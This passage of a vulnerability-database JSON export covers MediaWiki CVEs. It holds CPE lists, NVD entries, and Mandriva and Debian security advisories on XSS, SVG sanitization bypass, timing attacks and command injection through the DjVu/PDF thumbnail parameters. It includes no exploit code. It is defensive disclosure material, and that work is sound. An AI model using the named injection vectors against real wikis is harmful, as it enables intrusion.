"cpe:2.3:a:mediawiki:mediawiki:1.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.15.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.4:*:*:*:*:*:*:*", 
"cpe:2.3:a:mediawiki:mediawiki:1.15.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.13.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:beta2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.13:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.11:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.16.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4:beta6:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:alpha1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.13:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:beta4:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.13.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.15.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.10.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.14.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:mediawiki:mediawiki:1.18:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.10.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.15.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.14:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.13.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4:beta4:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4:beta2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.18.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.16.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.15.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.18.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:rc3:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.11.0:rc1:*:*:*:*:*:*", 
"cpe:2.3:a:mediawiki:mediawiki:1.20:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4:beta3:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.11:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.16.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.18.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.11:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:beta1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.12.0:rc1:*:*:*:*:*:*", 
"cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.14:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.18:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.16.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.12.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.10.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.15.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:beta3:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:52:48", "description": "Cross-site scripting (XSS) vulnerability in MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to inject arbitrary web script or HTML via a -o-link attribute.", "edition": 5, "cvss3": {}, "published": "2014-05-12T14:55:00", "title": "CVE-2013-6454", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6454"], "modified": "2014-05-13T14:21:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.21", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.3", 
"cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.19.6"], "id": "CVE-2013-6454", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6454", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:01:14", "description": "MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5, and 1.19.x before 1.19.11, when DjVu or PDF file upload support is enabled, allows remote attackers to execute arbitrary commands via shell metacharacters in (1) the page parameter to includes/media/DjVu.php; (2) the w parameter (aka width field) to thumb.php, which is not properly handled by includes/media/PdfHandler_body.php; and possibly unspecified vectors in (3) includes/media/Bitmap.php and (4) includes/media/ImageHandler.php.", "edition": 3, "cvss3": {}, "published": "2014-01-30T23:55:00", "title": 
"CVE-2014-1610", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1610"], "modified": "2016-05-25T15:01:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.21.4", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.19.10", "cpe:/a:mediawiki:mediawiki:1.22.1", "cpe:/a:mediawiki:mediawiki:1.19.6"], "id": "CVE-2014-1610", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1610", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "cvelist": ["CVE-2014-2244", "CVE-2014-2242", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-4568", "CVE-2013-6472", "CVE-2014-2243", "CVE-2013-6452", "CVE-2013-6451"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:057\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : mediawiki\r\n Date : March 13, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Updated mediawiki packages fix multiple vulnerabilities:\r\n \r\n MediaWiki user Michael M reported that the fix for CVE-2013-4568\r\n allowed insertion of escaped CSS values which could pass the CSS\r\n validation checks, resulting in XSS (CVE-2013-6451).\r\n \r\n Chris from RationalWiki reported that SVG files could be uploaded\r\n that include external stylesheets, which could lead to XSS when an\r\n XSL was used to include JavaScript (CVE-2013-6452).\r\n \r\n During internal review, it was discovered that MediaWiki's SVG\r\n sanitization could be bypassed when the XML was considered invalid\r\n (CVE-2013-6453).\r\n \r\n During internal review, it was discovered that MediaWiki displayed some\r\n information about deleted pages in the log API, enhanced RecentChanges,\r\n and user watchlists (CVE-2013-6472).\r\n \r\n 
Netanel Rubin from Check Point discovered a remote code execution\r\n vulnerability in MediaWiki's thumbnail generation for DjVu\r\n files. Internal review also discovered similar logic in the PdfHandler\r\n extension, which could be exploited in a similar way (CVE-2014-1610).\r\n \r\n MediaWiki before 1.22.3 does not block unsafe namespaces, such as a\r\n W3C XHTML namespace, in uploaded SVG files. Some client software may\r\n use these namespaces in a way that results in XSS. This was fixed\r\n by disallowing uploading SVG files using non-whitelisted namespaces\r\n (CVE-2014-2242).\r\n \r\n MediaWiki before 1.22.3 performs token comparison that may be\r\n vulnerable to timing attacks. This was fixed by making token\r\n comparison use constant time (CVE-2014-2243).\r\n \r\n MediaWiki before 1.22.3 could allow an attacker to perform XSS attacks,\r\n due to flaw with link handling in api.php. This was fixed such that\r\n it won't find links in the middle of api.php links (CVE-2014-2244).\r\n \r\n MediaWiki has been updated to version 1.22.3, which fixes these issues,\r\n as well as several others.\r\n \r\n Also, the mediawiki-ldapauthentication and mediawiki-math extensions\r\n have been updated to newer versions that are compatible with MediaWiki\r\n 1.22.\r\n \r\n Additionally, the mediawiki-graphviz extension has been obsoleted,\r\n due to the fact that it is unmaintained upstream and is vulnerable\r\n to cross-site scripting attacks.\r\n \r\n Note: if you were using the instances feature in these packages to\r\n support multiple wiki instances, this feature has now been removed.\r\n You will need to maintain separate wiki instances manually.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6451\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6452\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6453\r\n 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6472\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1610\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2242\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2243\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2244\r\n http://advisories.mageia.org/MGASA-2014-0113.html\r\n http://advisories.mageia.org/MGASA-2014-0124.html\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n 0763c6b913556fd3d098e14e6711d4c9 mbs1/x86_64/mediawiki-1.22.3-1.mbs1.noarch.rpm\r\n 3f3d638b7a09dfc700a56f06a0e06629 mbs1/x86_64/mediawiki-ldapauthentication-2.0f-1.mbs1.noarch.rpm\r\n c1bdd7ff8e5ab29f74891cb4fa92bff0 mbs1/x86_64/mediawiki-mysql-1.22.3-1.mbs1.noarch.rpm\r\n 6cd761769b330e837612ed079816019f mbs1/x86_64/mediawiki-pgsql-1.22.3-1.mbs1.noarch.rpm\r\n e484574d3776723c87e46a832daf3c4a mbs1/x86_64/mediawiki-sqlite-1.22.3-1.mbs1.noarch.rpm \r\n 870886ea628aaac381b4ab4210e33ea0 mbs1/SRPMS/mediawiki-1.22.3-1.mbs1.src.rpm\r\n bfbd6cc7fb3ce82be5c01564c5bfddde mbs1/SRPMS/mediawiki-ldapauthentication-2.0f-1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. 
You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFTIZKGmqjQ0CJFipgRAjIFAKCLVeGKatrjL2G/cYBZKCkekZ+BrgCdGfjO\r\naivXRBBXbumCTNMTeujkTrc=\r\n=5vFM\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-05T00:00:00", "published": "2014-05-05T00:00:00", "id": "SECURITYVULNS:DOC:30625", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30625", "title": "[ MDVSA-2014:057 ] mediawiki", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-7295"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3046-1 security@debian.org\r\nhttp://www.debian.org/security/ Salvatore Bonaccorso\r\nOctober 05, 2014 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : mediawiki\r\nCVE ID : CVE-2014-7295\r\n\r\nIt was reported that MediaWiki, a website engine for collaborative work,\r\nallowed to load user-created CSS on pages where user-created JavaScript\r\nis not allowed. 
A wiki user could be tricked into performing actions by\r\nmanipulating the interface from CSS, or JavaScript code being executed\r\nfrom CSS, on security-wise sensitive pages like Special:Preferences and\r\nSpecial:UserLogin. This update removes the separation of CSS and\r\nJavaScript module allowance.\r\n\r\nFor the stable distribution (wheezy), this problem has been fixed in\r\nversion 1:1.19.20+dfsg-0+deb7u1.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 1:1.19.20+dfsg-1.\r\n\r\nWe recommend that you upgrade your mediawiki packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niQIcBAEBCgAGBQJUMWQQAAoJEAVMuPMTQ89EIFEP/jGfYxU9UQ4JBoIu84wsRjuP\r\nMXI7mGNuhA9dnwxKaAzEddqlmVrVy5tgP18kanlB1agzBR3O7JWqel8BjAWWU3wV\r\nLIRTrlTQTh3EFeXuaPAKUrXPHognDcixhcPUNsVn6oeuwNaHDI7T9cQseDKlnvPU\r\nVtVexVVE6YpPyUg3LIO6EPt1U3dVLr6AG8/BbweooYwQyB3tupbemGWptI6rEeRK\r\nMqIxRuld3xkAG7SZJXv7pLnRDZBzXW/LcRD5r7CtSdfUeIFqcMOBhMR2lWH52jMg\r\n0jM3koPnukXOYPOQIYD+l3+wG65mPqb/gtToRObPqGgcPCTup0eMcWu97Nz9CUDp\r\nQW2iTo/M9e+4T+uAg5ETeWiK0i3k6R7MpcSBJuTv2ckbDvqZKvslzLjLXJ4MsheD\r\nmbv0gmub3wDojWLwYq8+PAsCJSaGFZhZqME2aFps0xxqFQVo03JULZZK/hbIjFgl\r\nGpXH+Exb7iAuCiZM+tSgMe/GJ324J53qudKaifDbypaLWZLT4T1WN24IHZv6Icpv\r\nW08Em5Guc0nyC4mYFb9+J+t/yXd6M3hfhc1I+9fqdX+uLFlvx/nNm8wU87QuuQs/\r\nk64awl9aUDbZxDGdC8OxwDfh1EeXroNMHueDPj82t76+dRU3+sBjJkhnQMp3S/LD\r\nRMJttMX597NHP2RBLApx\r\n=KdNC\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31179", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31179", "title": "[SECURITY] [DSA 3046-1] mediawiki security update", "type": "securityvulns", "cvss": 
{"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2021-01-07T11:54:34", "description": "Updated mediawiki packages fix multiple vulnerabilities :\n\nMediaWiki user Michael M reported that the fix for CVE-2013-4568\nallowed insertion of escaped CSS values which could pass the CSS\nvalidation checks, resulting in XSS (CVE-2013-6451).\n\nChris from RationalWiki reported that SVG files could be uploaded that\ninclude external stylesheets, which could lead to XSS when an XSL was\nused to include JavaScript (CVE-2013-6452).\n\nDuring internal review, it was discovered that MediaWiki's SVG\nsanitization could be bypassed when the XML was considered invalid\n(CVE-2013-6453).\n\nDuring internal review, it was discovered that MediaWiki displayed\nsome information about deleted pages in the log API, enhanced\nRecentChanges, and user watchlists (CVE-2013-6472).\n\nNetanel Rubin from Check Point discovered a remote code execution\nvulnerability in MediaWiki's thumbnail generation for DjVu files.\nInternal review also discovered similar logic in the PdfHandler\nextension, which could be exploited in a similar way (CVE-2014-1610).\n\nMediaWiki before 1.22.3 does not block unsafe namespaces, such as a\nW3C XHTML namespace, in uploaded SVG files. Some client software may\nuse these namespaces in a way that results in XSS. This was fixed by\ndisallowing uploading SVG files using non-whitelisted namespaces\n(CVE-2014-2242).\n\nMediaWiki before 1.22.3 performs token comparison that may be\nvulnerable to timing attacks. This was fixed by making token\ncomparison use constant time (CVE-2014-2243).\n\nMediaWiki before 1.22.3 could allow an attacker to perform XSS\nattacks, due to flaw with link handling in api.php. 
This was fixed\nsuch that it won't find links in the middle of api.php links\n(CVE-2014-2244).\n\nMediaWiki has been updated to version 1.22.3, which fixes these\nissues, as well as several others.\n\nAlso, the mediawiki-ldapauthentication and mediawiki-math extensions\nhave been updated to newer versions that are compatible with MediaWiki\n1.22.\n\nAdditionally, the mediawiki-graphviz extension has been obsoleted, due\nto the fact that it is unmaintained upstream and is vulnerable to\ncross-site scripting attacks.\n\nNote: if you were using the instances feature in these packages to\nsupport multiple wiki instances, this feature has now been removed.\nYou will need to maintain separate wiki instances manually.", "edition": 25, "published": "2014-03-14T00:00:00", "title": "Mandriva Linux Security Advisory : mediawiki (MDVSA-2014:057)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-2244", "CVE-2014-2242", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-4568", "CVE-2013-6472", "CVE-2014-2243", "CVE-2013-6452", 